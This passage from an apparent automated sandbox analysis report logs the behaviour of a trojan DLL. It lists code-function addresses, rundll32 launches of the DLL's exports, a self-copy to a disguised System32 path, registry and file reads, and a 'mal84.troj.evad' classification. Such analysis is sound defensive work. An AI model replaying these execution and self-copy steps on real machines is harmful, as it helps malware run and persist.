                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096EA55
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00956453
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095CE5A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00967445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00963043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095AE43
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095544C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095AA4E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096B677
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095387F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095B464
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095EE60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00953A6C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00956869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00957795
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095B191
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00961591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096DB87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00954B81
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00963782
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00958D80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095358B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096E3B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096D7BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009559BF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009543BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009685B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096E5A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00960BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096DDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009689A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009575D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009519C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095A3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009551EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096EDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095CB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00954D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00963D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096BF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096E10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096CD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095F73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00969124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095A92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00966540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00970370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095CF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A6070
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4BE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4AE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D01291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D01CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D020CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D0261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00D00370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CECB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CEF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CFCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DD0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DCCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DBA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC9124
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4BAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: nhlHEF5IVY.dllVirustotal: Detection: 21%
                      Source: nhlHEF5IVY.dllReversingLabs: Detection: 17%
                      Source: nhlHEF5IVY.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DED.tmpJump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@36/14@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6152:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6640
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6028:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: nhlHEF5IVY.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: nhlHEF5IVY.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
